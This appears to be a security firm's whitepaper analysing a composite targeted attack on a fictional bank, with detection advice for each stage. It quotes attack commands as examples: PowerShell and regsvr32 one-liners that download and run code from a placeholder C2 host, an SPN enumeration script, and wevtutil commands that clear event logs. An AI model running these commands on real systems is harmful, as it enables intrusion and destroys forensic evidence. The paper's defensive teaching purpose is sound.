ANOTHERBREACH

YET

Analysis of a Targeted Cyber Attack

An F-Secure Consulting Whitepaper

F-Secure Consulting is the amalgamation of four

specialist cyber security firms – MWR, nSense, Inverse

path, and Digital Assurance – combining 59 years of real-

world expertise into one global, research-led technical

consultancy.

We design solutions and provide tailored advice in all

areas of cyber security, from incident response through

to securing critical embedded systems. Like storm

chasers, our curiosity keeps us ahead of the threat as

it evolves.

ABOUT F-SECURE CONSULTING

F-Secure Countercept provides a complete managed

service for the detection of, and response to, cyber

attacks, specializing in the ability to detect and respond

to state-sponsored attacks (APT groups).

Unlike the traditional style of intrusion detection,

based on purely ‘alert driven’ monitoring, F-Secure

Countercept offers a 24/7/365 proactive threat-hunting

service built around Endpoint Detection and Response

(EDR) that utilizes security professionals with real-world

experience in attack simulation and incident response.

ABOUT F-SECURE COUNTERCEPT

Yet Another Breach

”Written in partnership with F-Secure Countercept,

this paper provides an example of a modern, targeted

attack against a large organization, and the actions of an

unsuccessful defensive team. All its contents are based

on our combined, real-world experience.

We consider how and why the many security controls

companies typically have in place fail to prevent or

detect such attacks. We also describe the security

controls and detection methodologies that would have

been effective at each stage.

THIS PAPER WILL HELP:

CISOs/CIOs

• Understand the nature of a modern targeted attack• Ask your security teams the right questions • Assess whether your organization could withstand

such an attack

Technical cyber defense staff

• Understand the tactics typically used by modern threat actors

• Gauge whether the controls you have in place are effective against them

• Discover which new controls are worth adding to your defensive setup

In-house incident response teams

• Assess whether the data sources and technologies you have in place would allow an effective investigation and response exercise in the face of such an attack

WHERE DID WE GO WRONG?“

Yet Another Breach

1

CONTENTS

2

3

4

6

7

9

10

12

13

18

20

21

22

23

24

YET ANOTHER BREACH

EXAMPLE PROCESS OF A TARGETED AT TACK SIMULATION

PERIMETER BREACH – INITIAL EXPLOITATION

F-SECURE COUNTERCEPT INSIGHTS

PAYLOAD EXECUTION

F-SECURE COUNTERCEPT INSIGHTS

MAINTAINING ACCESS

F-SECURE COUNTERCEPT INSIGHTS

INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT

F-SECURE COUNTERCEPT INSIGHTS

DATA EXFILTRATION

F-SECURE COUNTERCEPT INSIGHTS

ACTIONS ON OBJECTIVES

TIMELINE OF ATTACK

CONCLUSIONS

Yet Another Breach

2

As attackers become more persistent

and defensive, threat-hunting teams

are adapting. The best are equally

as aggressive, continually securing,

monitoring, and responding to attacks

on their networks.

Though reports are frequently released

about the latest organization to fall

victim to an Advanced Persistent

Threat (APT), the reality is relatively

simple techniques are used to attack

them. The APT merely relies on a lack

of preparation in terms of prevention,

detection, and response.

The Cyber Kill Chain concept is

commonly used to illustrate an attack.

Often shown as a linear process, the

attacker makes eight steps to reach

their goal:

YET ANOTHER BREACH

Reconnaissance

The surveillance stage. Attackers assess the vulnerabilities of their target’s network estate (usually from the outside-in) to design a suitable attack plan.

Intrusion

Using the data gathered through their reconnaissance, the attacker enters their target’s systems, often making use of malware or security vulnerabilities.

Exploitation

The attacker exploits vulnerabilities and delivers malicious code onto the system to get a better foothold.

Privilege Escalation

To gain access to more data and permissions, the attacker escalates their privileges, often to an Admin.

Lateral Movement

Once in the system, the attacker can move laterally to other systems and accounts to gain more leverage, e.g. higher permissions, more critical data, and greater access.

Obfuscation/anti-forensics

The attacker lays false trails, compromises data, and clears logs to confuse and slow down any forensics team.

Denial of Service

Standard access for users and systems is disrupted to stop the attack from being monitored, tracked, or blocked.

Actions on Objectives

The extraction stage. The attacker finally executes actions to achieve their goal, from encryption for ransom, to data exfiltration or destruction.

This description of the attacker methodology

works at a high-level, but in practice, things are

rarely this linear.

Yet Another Breach

3

Acme Bank is a large financial institution with

30,000 employees and 20 offices worldwide. The

bank has a large security team of 80 staff, plus a

24/7 Security Operations Center (SOC) employing

15 individuals.

The security team use many of the security

processes and technologies common to others in

its sector. For example, the bank is both PCI- and

ISO27001-compliant. It also has: centralized patch

management solutions in place, strong password

policies, employee security, awareness training,

network IDS/IPS appliances, secure web and email

gateways, antivirus software, data-loss prevention

technologies, centralized logging using SIEM

technology, regular security testing, and a range

of intelligence feeds

Several waves of targeted phishing attacks were

launched against Acme Bank from 2016. The

attackers repeatedly compromised the bank’s

corporate workstations. In every instance

the security team was aware of, the target

workstations were removed from the network,

forensically investigated, and rebuilt.

The domains used for phishing attacks and the

command-and-control channels, were also

blocked at the organization’s web and mail

gateways.

No more aggressive activity was seen after the

initial barrage of attacks, and it was thought the

threat had been successfully repelled. However,

in late July, the attackers were able to reach the

SWIFT payment systems and transfer large sums

of money to accounts overseas. This activity

was only detected after the funds had been

transferred. And it’s now believed that most of

it was linked to a single advanced threat actor,

codenamed ‘Laser Tiger’.

This chain of events highlights significant

deficiencies in both the preventative controls and

detection capabilities deployed by Acme Bank.

EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION

TO DETECT COMPROMISES AND RESPOND EFFECTIVELY,

THREAT-HUNTERS DEVELOP A REAL-WORLD

UNDERSTANDING OF OFFENSIVE TECHNIQUES WITHIN

THE ATTACKER MINDSET – THEY BECOME RESEARCHERS,

CONTINUALLY COLLECTING AND ANALYSING DATA.

Yet Another Breach

4

Laser Tiger routinely used targeted spear-phishing

to obtain credentials and compromise user

workstations within Acme Bank. The phishing emails

contained many forms of content, ranging from

malicious links and attachments, to more complex

social engineering techniques.

One phishing campaign that focused on credential

harvesting used an employee survey targeting a few

hundred users. It copied the legitimate employee

survey page present on the Acme Bank website. The

URL for this domain (acmebank-survey.com) also

imitated the legitimate domain (acmebank.com),

tricking many users.

Two smaller, more targeted campaigns that involved

a deep level of social engineering were targeted at

the assistants of key executives in the bank.

Multiple messages were exchanged with a human

operator pretending to work for an events

management company. Their goal was to have the

user download and execute a specific payload.

The attackers demonstrated knowledge of staff

structure, roles, and employee relationships,

suggesting the collection of a significant amount

of open-source intelligence (OSINT) prior to

the attack, using sources such as LinkedIn and

Facebook. In one instance, a message closely

matched content found on a public profile

on Glassdoor.

PERIMETER BREACH INITIAL EXPLOITATION

Yet Another Breach

AWS CLOUDFLARE

5

Acme Bank had security controls in place that neither

prevented nor detected this stage of the attack. Some of

the most significant are listed below:

Threat Intelligence FeedsThis was a targeted attack using unique domains, IPs, and payloads. None of these were on any blacklists.

Uncategorized Site BlockingAcme Bank’s web proxy blocked access to newly-registered domains that hadn’t been categorized. However, the domains used in the attack had been registered some time in advance and categorized as financial news sites. In some cases, recently expired trusted domains were re-registered and used.

Security Patching The exploitation techniques didn’t require the exploitation of any vulnerabilities and therefore worked successfully on fully-patched systems. While common executable file types were blocked at both web and mail gateways, this didn’t include more esoteric executable equivalents, such as HTA files and Office documents containing macros.

Yet Another Breach

F-SECURE COUNTERCEPT

INSIGHTS

6

The attackers relied heavily on delivering link and

attachment payloads via email. From a defensive

perspective, it’s important that security teams are given

access to email data sets and the ability to perform

automated analysis at scale. While it’s not practical to

block all potentially malicious content, it is possible to

flag some for review.

Links are commonly used by attackers to direct users

to malicious external content. Automated analysis of all

links received in emails, and web proxy logs to ascertain

the content returned, can prove a useful technique for

highlighting emails that could be harmful. In this instance,

it’s uncommon for HTA files or macro-enabled Microsoft

Office documents to be received from external sources,

so these could be flagged for review.

Varying levels of email attachment analysis can also be

performed. At a basic level, collecting the names or types

of attachment can highlight suspicious payloads. A more

effective technique would be to analyze the payloads

themselves. A static analysis of all attachments to look

for embedded macros or executable content should be

complemented by a dynamic analysis to understand in

detail what each attachment does.

As more advanced attackers are likely to anticipate

dynamic analysis solutions and use tricks to defeat them,

it’s still important to use more generic indicators to triage

attachments for manual analysis.

Yet Another BreachYet Another Breach

7

PAYLOAD EXECUTIONHTA files and Microsoft Office documents with embedded

macros were the two primary techniques used to achieve

code execution on end user workstations within the

Acme Bank network. A range of phishing attacks was

launched, containing payloads that made use of legitimate

Windows functionality – such as PowerShell, regsvr32.exe,

and Windows script engines (WScript/JScript) – to load

malicious code. The initial dropper code would commonly

retrieve a remote payload and inject code directly into

memory within a legitimate Windows process.

EXAMPLE 1

One of the payloads utilizing PowerShell exploited the IEX

and WebClient functionality to download its second stage

from a remote HTTP resource using the following:

EXAMPLE 2

regsvr32.exe was used to run a second scripting stage from

an external HTTP resource:

1 powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass-nologo -noprofile -c “$u=new-object net.

webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.

CredentialCache]::DefaultCredentials;iex($u.DownloadString(‘http:// c2-domain.com/abc’))”

1 Set oShell = CreateObject (“WScript.Shell”)

2 oShell.run “regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll”

Yet Another Breach

8

Keeping the initial payload small, and loading the second

stage remotely within memory, is advantageous to

attackers. It makes forensic discovery harder, and allows

them to easily change the functionality of their payload in

future.

These techniques were successfully used against Acme

bank, bypassing a number of security controls in place:

Antivirus

No known malicious binaries were used. Instead, legitimate Windows functionality was utilized with small, dynamic, initial payloads that loaded the second stages entirely within the memory space of legitimate processes.

Application Control

Acme Bank makes use of Microsoft AppLocker to prevent general users from launching arbitrary executables and scripts from certain locations. However, Office macros are exempt from this, and HTA files can load within Internet Explorer, rendering AppLocker ineffective.

Yet Another Breach

F-SECURE COUNTERCEPT

INSIGHTS

9

Security teams need effective endpoint detection and

response software (EDR) to collect useful data, like real-

time process execution events across all endpoints. This is

an essential first step when tracking attackers. Without it,

Acme Bank’s security team was essential left blind to the

actions performed on its network. Attacker process activity

usually differs greatly from that of typical users. Laser Tiger,

for example, used many built-in Windows tools with specific

command line parameters uncommon for the average

employee.

Anomaly-detection techniques applied to these data sets,

along with additional scoring for particularly dangerous

command line options, can be used to accurately identify

suspicious uses of legitimate Windows functionality. This

includes options to load code from external sources and

anomalous parent-child relationships. For example, it would

be unusual to see Microsoft Office open a macro-enabled

document, then launch regsvr32.exe with command line

arguments for loading a script from HTTP resources.

More advanced EDR solutions could have memory analysis

capabilities that also detect evidence of code injection,

malicious DLL loading, and API hooking. This approach can

help identify other suspicious scenarios, such as the above

processes also showing evidence of reflectively loaded DLLs

and/or remotely injected threads. These are traits typical of

memory-resident malware.

We have used these methods to effectively detect file-free

malware utilizing legitimate scripting engines and code-

injection techniques.

Yet Another BreachYet Another Breach

10

Attackers commonly seek to achieve sustained access to a

network’s compromised systems over a long period of time.

Laser Tiger did so using multiple techniques to provide a

choice of routes into Acme Bank’s network. This meant if one or

two were discovered and shut down, it would still have access via

other means.

One method of maintaining persistent access was the use of

conditional Microsoft Outlook rules that, when triggered, would

download and execute a payload in-memory. This ensured their

access was resistant to system reboots and logins/logoffs, i.e.

every time the affected user started Microsoft Outlook, the

attackers regained remote control of the workstation.

The attackers also made use of more common persistence

techniques, such as registry-based Run keys and scheduled tasks.

However, they avoided any that involved writing an actual file to-

disk on the user workstations; all techniques were file-free and

loaded the malicious payload within memory from across

the network.

When the attackers later targeted servers within Acme

Bank’s environment and gained administrative-level

access, their tactics changed, and custom services were

created to deliver payloads. Service executables were

placed in legitimate locations within Program Files,

digitally signed with a certificate authority, placed on

the server, and made to blend in with existing software

to avoid detection. Timestamps for the files were also

modified to look as though they’d been present for years.

For example:

MAINTAINING ACCESS

Yet Another Breach

Service Name Java Update Service

Description Provides updates for the Java™ platform

Executable Path C:\Program Files (x86)\Java\ jre1.8.0_73\bin\ javau.exe

11

Acme Bank had a chance to detect the compromised workstations at

this stage, but the controls they had in place failed to do so.

Security Information and Event Management (SIEM)

Logging provided Acme Bank with log sources (e.g. Windows event logs) from across its network. These sometimes included key data such as the creation of new services or scheduled tasks, but missed others, such as registry Run keys and Outlook rules. With new software and updates causing log source events to occur in vast numbers every day, but with no advanced analysis functionality or anomaly-detection capabilities in place, it was easy for malicious modifications to get lost within the background noise. As a result, the data that was actually available became relevant only in retrospect.

Yet Another Breach

F-SECURE COUNTERCEPT

INSIGHTS

12

Monitoring for new persistence entries is one of the

most effective ways for teams to detect the early stages

of a compromise. Windows provides a multitude of

persistence mechanisms, such as services, scheduled

tasks, registry locations, and start-up folders.

While Acme Bank had information relating to these

mechanisms from Windows logs, it was only collected

from key servers. Thus, in a snowstorm of installs and

updates, without the correct analysis techniques in

place, the chances of identifying a malicious compromise

were poor.

An effective method of persistence detection would

be to gather as much persistence data as possible from

the entire workstation and server estate. This should be

complete with supplementary data, such as cryptographic

file hashes and digital signature information. EDR toolsets

should be capable of doing this data harvesting.

The data sets can then be aggregated to perform

frequency analysis and be automatically-enriched using

external information sources such as software libraries

and data sources like VirusTotal. This makes it far easier

to differentiate rapidly between legitimate updates and

malicious, scheduled tasks. In practice, the difference

between events like:

a. A single Google Chrome update, made to 30,000

systems, using a known-good hash, and digitally

signed by Google.

b. A small number of potentially malicious, scheduled

tasks referencing PowerShell, with options to remotely

load code from an HTTP resource.

Yet Another BreachYet Another Breach

13

INTERNAL RECONNAISSANCE AND LATERAL MOVEMENTSuccessfully breaching the perimeter

is the first step of any targeted attack

against a large organization. With access

to workstations inside the Acme Bank

network, the attackers were able to

then begin the information-gathering

phase. Their aim: to learn more about

the internal network architecture and

applications in use, with a view to extend

their access across the environment.

The initial stages of this reconnaissance

involved retrieving information about

the domain, such as users, groups,

group memberships, and key systems

and services. Instead of more traditional

techniques, like large-scale port

scanning, most information-gathering

activities were performed using in-

memory PowerShell and built-in

Windows functionality, such as DNS,

WMI, and LDAP.

The majority of network traffic in this

case simply used LDAP connections

to domain controllers. This gave the

attackers detailed knowledge of the

wider internal structure of the network,

which systems might be of interest

to them, and which users were worth

targeting in order to gain necessary

access.

Gaining more privileged access allowed

the attackers to move from their

existing compromised workstations

to other administrative workstations

and key servers. Firstly, the attackers

conducted SPN scanning via LDAP to

extract information about all services

present within the Active Directory

forest. This technique returns

information about hosts and services

running across the network, while only

requiring a single TCP connection to

LDAP on a domain controller.

1 ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory. Forest]::GetCurrentForest()).RootDomain

2 $ADForestInfoRootDomainDN = “DC=” + $ADForestInfoRootDomain -Replace(“\.”,’,DC=’)

3 $ADDomainInfoLGCDN = ‘GC://’ + $ADForestInfoRootDomainDN

4 $root = [ADSI]$ADDomainInfoLGCDN

5 $ADSPNSearcher = new-Object System.DirectoryServices. DirectorySearcher($root,”(serviceprincipalname=*)”)

6 $ADSPNSearcher.PageSize = 500

7 $AllADSQLServerSPNs = $ADSPNSearcher.FindAll()

Yet Another Breach

14

With this information to-hand, the

attackers were able to use their existing

credentials to request Kerberos service

tickets and access all the services

present across the network. Kerberos

service tickets are encrypted using a

key from the password for the service

domain account itself. This allows them

to be used to perform offline password-

cracking attacks without triggering IDS

systems or account lockout thresholds,

as would be the case for a normal

online password-guessing attack.

Insufficiently complex passwords can

then be cracked, with privileged service

account passwords often allowing a

much greater level of access across

the network.

Evidence of unusually large numbers

of Kerberos service ticket requests was

seen in logs from Windows domain

controllers for specific users that

were later determined to have been

victims of the initial spear-phishing

attacks. It’s believed the attackers were

able to crack some of these Kerberos

service tickets so they could obtain the

password for domain service accounts.

Unfortunately for Acme Bank, this

was only discovered during forensic

investigation post-breach.

Domain Auth

Kerberos Ticket Granting Ticket (TGT)

TGS

Access Granted

What is the SPN for Exchange?

Exchange SPN

TGT & SPN

Ticket Granting Service (TGS) Ticket

Yet Another Breach

15

Little forensic evidence of actual lateral movement was found

after the attack. While Windows logs for domain controllers

and key production servers were being collected using Acme

Bank’s SIEM, logs from the wider network of workstations and

development and test environments weren’t collected. Suspicious

activity within the domain controller logs was identified for one

particular service account and one admin user who worked on the

SWIFT environment. Subsequent manual forensic investigation

of the staging server where the service account was in use, and

of the admin user’s personal workstation, revealed some lateral

movement techniques used.

Using the following commands, Windows event logs were seen

being cleared by the attackers, removing evidence of their activity.

However, traces of the relevant logs were successfully recovered

from volume shadow copies on the system.

Remote access to the systems was gained using both network

logins (type 3) over TCP/445 to spawn new processes, and RDP

access (type 8) via TCP/3389 in the case of the staging server.

The service account was identified as having a weak password, so

it’s assumed this was compromised from the SPN scanning and

Kerberos service ticket cracking.

2 wevtutil.exe cl “Application”

3 wevtutil.exe cl “Security”

4 wevtutil.exe cl “System”

1 Wevtutil.exe cl “Microsoft-Windows-TerminalServices-LocalSessionManager/

Operational” wevtutil.exe cl “Microsoft-Windows-TerminalServices-

RemoteConnectionManager/Operational” wevtutil.exe cl “Microsoft-Windows-

RemoteDesktopServices-RdpCoreTS/Operational” wevtutil.exe cl “Microsoft-

Windows-RemoteDesktopServices-SessionServices/Operational”

Yet Another Breach

16

Remote access to the systems was gained using both network

logins (type 3) over TCP/445 to spawn new processes, and RDP

access (type 8) via TCP/3389 in the case of the staging server.

The service account was identified as having a weak password, so

it’s assumed this was compromised from the SPN scanning and

Kerberos service ticket cracking.

Another domain account present on this system had workstation

admin rights and, from the timeline of events, it appeared this was

used to specifically target the SWIFT admin user’s workstation and

harvest their privileged credentials from memory. Consequently,

it’s believed the workstation admin account was harvested from

the compromised staging server, allowing the attackers

to directly target the administrative users responsible for the

SWIFT environment.

Shortly after these events, wide-ranging access using the admin’s

account was observed within the SWIFT production environment

from the IP address of one of the original compromised

workstations and far in excess of the usual access patterns.

Yet Another Breach

RDP

SMB

Mimikatz

17

Numerous security controls in Acme Bank’s environment failed

at this stage of the attack, but some of the key controls are

outlined below:

Password PolicyWhile a strong password policy was in place for new user accounts, the affected service account was years old without a set password expiry. Offline password cracking is effective against all but the strongest passwords, so the lack of regular password-cracking exercises within Acme Bank let this account go unnoticed and allowed the attackers to compromise it.

SIEM User Account MonitoringAcme Bank’s SIEM consumed all Windows domain controller logs and critical production server logs but not logs from the wider infrastructure. This meant it was blind to attacks targeting development and test environments, as well as the entire workstation estate. Additionally, all views and alerting were focused on account brute-forcing and creation of new user accounts or modification of existing group memberships. However, Kerberos service ticket-specific monitoring wasn’t performed, meaning the sudden request for thousands of Kerberos service tickets by a single employee user account went unnoticed.

Network IDSIDS appliances were placed at strategic locations to monitor network traffic for signs of attack, with events reported to the centralized SIEM. These were highly tuned to identify large-scale network port scanning and similar network enumeration techniques. However, they couldn’t identify modern enumeration techniques that utilize LDAP queries using a single connection to a small number of domain controllers. The number of alerts generated by the IDS was also extremely high and false-positive prone, so any relevant events were likely to be swallowed by a sea of noise.

Host-Based FirewallsWindows Firewall was in use across the Microsoft domain estate with a domain profile set. While this had a default-deny rule for inbound connections, many of the default rules in place allowed access to key Windows ports such as TCP 135/139/445 for file and printer sharing. All servers also had a domain policy set via GPO to have remote desktop enabled. This crippled the protection of the host-based firewall and enabled the attackers to gain remote administrative access to most workstations and servers with ease, once they had valid credentials.

Yet Another Breach

F-SECURE COUNTERCEPT

INSIGHTS

18

Acme Bank was reliant on traditional security products:

such as antivirus to detect payloads, and IDS to detect

network scanning. The attackers bypassed these controls

and neither product provided any security value.

Additionally, their account-monitoring activity only

covered key production servers and domain controllers

and wasn’t monitoring for Kerberos-specific attacks.

Once an attacker has a foothold in a network and access

to legitimate user credentials, detection can become

significantly more difficult as the attacker will often use

purely legitimate tools from then on. Two of the most

appropriate techniques at this point would have been:

a. Slowing the ability of the attacker to move around the

network

b. Anomalous behavior-detection techniques,

identifying user accounts or systems operating

outside normal usage patterns

At the simplest level, good restriction of management

functionality using host-based firewalls can reduce an

attacker’s network mobility. Obtaining valid credentials

is one thing, but without access to management ports on

most of the network (such as RPC, SMB, RDP, WinRM, SSH,

and so on), it becomes very hard to make effective use of

these credentials.

Yet Another BreachYet Another Breach

19

Common group policy controls can effectively

prevent remote use of privileged credentials.

For example, many accounts that require

administrative access on a system might only

require that access locally, due to being service

accounts or desktop support accounts that

enable employees with physical access to

particular systems. Use of the ‘Deny access

to this computer from the network’ group

policy option and other similar controls can be

effective in limiting the impact of compromise

for certain groups of privileged user accounts.

The ‘Restrict NTLM’ group of options can also

hinder the use of pass-the-hash attacks for

remote access.

For anomalous behavior detection, the basic

idea is to use rolling time windows to build

profiles of common activity. It should identify

the systems from which each user account

normally operates interactively, and which

systems are normally accessed over the

network. Common profiles for the amount of

data sent outbound to internet addresses or

downloaded from internal resources can also

be created.

A standard employee will generally operate

their user account at a single workstation

and access a common set of services across

the network. If that account requests 2,000

Kerberos tickets while the LDAP traffic for

the user’s workstation spikes significantly,

this falls outside the norm and should be

flagged. Likewise, a service account that

normally operates interactively on a common

set of servers is then seen operating from

a workstation and accessing systems using

network logins, has deviated from its profile.

Effective application of these techniques

without overwhelming security teams

with false positives requires careful use of

machine-learning techniques. The idea is to

build accurate models of predictable users

and systems, while ruling out the minority of

unpredictable ones. Some simple first steps

can be applied to cover common scenarios

using more traditional approaches. Reviewing

accounts requesting high numbers of Kerberos

service tickets per day, and adding exceptions

for noisy accounts, could easily spot SPN

scanning. Likewise, LDAP traffic from the bulk

of the network should have relatively tight

parameters of data-flow quantity, so a daily

review of systems seen making heavy use of

LDAP could spot network enumeration.

Yet Another BreachYet Another Breach

20

Laser Tiger used many different IPs and domains throughout its

campaign for both phishing sites and command-and-control

channels. A number of techniques was used to disguise the sites,

including:

• Reusing recently-expired domains that already had good reputations

• Ensuring sites were correctly categorized by web filters as benign

• Using legitimate content within sites

• Impersonating Acme Bank domains

• Using content distribution networks (CDNs) to proxy traffic

The infrastructure used was also changed regularly with no IP/

domain reused between campaigns. Acme Bank often focused

on blocking individual IPs/domains, and failed to anticipate

the attackers changing infrastructure to evade these controls.

The payloads on both workstations and servers were seen

communicating with the C2 infrastructure over HTTP, using

encrypted payloads.

At various points during the attack, there would have been

relatively significant quantities of network traffic - large-scale

mining of LDAP for information and SPN scanning would require

unusually high levels of LDAP traffic between compromised

workstations and domain controllers. Meanwhile, interactive RDP

sessions over long periods, and the theft of large data sets along

the way, would have resulted in far more internet-bound upload

traffic than usual from the compromised systems. However, Acme

Bank didn’t have good net-flow data feeding into its SIEM , or

analysis techniques that would have been able to spot deviations

from normal traffic patterns.

DATA EXFILTRATION

Yet Another Breach

F-SECURE COUNTERCEPT

INSIGHTS

21

Monitoring for anomalous traffic flows can be particularly

challenging when facing an advanced attacker. Traditional

approaches, such as using technical threat intelligence

involving ‘known-bad’ domains and IP addresses, are

ineffective as the attackers will simply use new infrastructure

that has no history of malicious activity. Reputation-based

analysis is a step forward but ineffective when the attackers

use positive reputation addresses, as in this case and likely in

any targeted attack conducted by a skilled group.

Domain history could have provided some interesting

findings, as the creation date of some of the phishing

domains was maybe just weeks or months old. Analysis

of DNS data for domains containing the word ‘Acme’, or

unfamiliar domains similar to real domains, would also have

highlighted those used by Laser Tiger. Careful analysis of

dates, registrars, and others associated with the domains

seen in use for the originally reported phishing emails and

implant payloads might also have provided leads. These

could be correlated against all information on all domains

with Acme Bank’s logs to help construct a shortlist of other

potentially malicious domains.

Detection of anomalous data flows relating to key services

and outbound traffic was discussed previously, but there are

other techniques that can be applied specifically to identify

communications channels. Similar learning models can be

applied to the standard user agents used by each system.

This will help identify new user agents that are potentially

related to an implant, while statistical techniques can identify

long-running, regular communication with outside domains

that are indicative of ‘beaconing’ behavior. These techniques

are false-positive prone when used in isolation. However,

when combined with anomaly-detection techniques, and

enriched with information on domains (such as global

popularity), they can yield strong defensive results. A smaller

number of systems that start beaconing to a previously

unseen domain can be differentiated from a popular Google

domain related to Google Chat that has been seen on the

network for many years.

Yet Another BreachYet Another Breach

22

Once Laser Tiger compromised a SWIFT administrator’s

workstation and privileged user account, it had unrestricted

access to the SWIFT environment. The earliest timestamps

indicate the attackers had access to the payment systems from

early July, when they presumably began gathering information

on the payment process. They are suspected of injecting

transfer information within the payment files that were held on

an FTP server, before being retrieved by the SWIFT application.

Unscheduled server restarts of critical systems were seen shortly

after the unusual SWIFT transfers took place. The attackers are

thought to have performed these restarts to remove forensic

artefacts from memory.

One day prior to the actual fraudulent SWIFT transactions, a

Distributed Denial of Service (DDoS) attack was launched against

Acme Bank’s main corporate website, taking it offline for eight

hours. The attack lasted for around 24 hours, making it a key

focus for the bank’s security team. Though no link can be proved,

the timing of the attack – just before the SWIFT transfers – and

the fact that no group claimed responsibility for the DDoS or

demanded ransom suggests it was a diversionary tactic by Laser

Tiger. Only on discovering the fraudulent transactions did Acme

Bank become aware of the full extent of the compromise and

launch a dedicated incident response process.

ACTIONS ON OBJECTIVES

Yet Another Breach

23

TIMELINE OF ATTACK

05/01/16

06/01/16

07/01/16

09/01/16

17/02/16

18/02/16

08/04/16

11/04/16

10/05/16

13/05/16

22/07/16

23/07/16

25/07/16

First phishing attacks launched with a

Microsoft Office macro payload

User reports suspicious email to security

team. Security team confirms email is

malicious and begins investigation

Command-and-control channel is

confirmed and blocked at the web proxy

Workstations are replaced and passwords

reset for all users who were confirmed to

have received the same email

Large-scale phishing campaign focused on

credentials theft using ‘acme-survey.com’

User reports suspicious email and

credentials are reset for users who

accessed the site

Phishing emails referencing a fake support

site dropping an HTA payload are delivered

Phishing campaign targets a smaller

number of users with a different HTA

payload

First use of compromised domain service

account

SWIFT admin user account used

to illegitimately access the SWIFT

environment

Distributed Denial of Service takes down

Acme Bank website for 8 hours

SWIFT transfers are made to overseas

accounts

Bank discovers fraudulent transaction and

begins incident response

Yet Another Breach

24

CONCLUSIONS

KEY TAKEAWAYS:

STEPS TOWARDS SECURITY:

This compromise is an example of how

today’s cyber attackers continually perform

reconnaissance and escalation of access over a

period of months or longer to achieve their goals.

Prevention and detection tactics can slow the

attacker, but whether they come to a standstill

depends on the skill and persistence of the

attacking and defending teams.

The Laser Tiger group demonstrated a very

high level of operational security in using in-

memory techniques and custom payloads,

relying on legitimate Windows functionality,

targeting specific users, and maintaining/

changing a comprehensive set of C2 channels.

The Acme Bank security team was unprepared

to handle such an adversary and, as a result, the

organization suffered a significant financial loss.

• Defense informs offense, offense informs defense. Understanding the techniques used by the threat allows you to prevent and detect more effectively

• Both prevention and detection should be used to slow a determined attacker

• Your network needs to be continually defended, requiring a skilled team of threat hunters

• Real-time, continuous monitoring of endpoints is essential – workstations are the front line, and the most common entry point into your network.

• Conduct a static analysis of all email attachments

• Use more generic indicators to triage attachments for manual analysis

• Ensure your EDR toolsets can gather as much persistence data as possible

• Response times matter. Although real-time detection is unlikely, spotting an attacker in the first hours or days of an attack is a huge win, especially considering compromises can last weeks, months, or even years

• Many traditional security controls aren’t capable of preventing or detecting modern offensive techniques used in targeted attacks. Modern approaches are needed, and targeted attack simulation exercises are the only way to truly test your defenses

• Review accounts requesting high numbers of Kerberos tickets

• Regularly carry out targeted attack simulation exercises

Yet Another Breach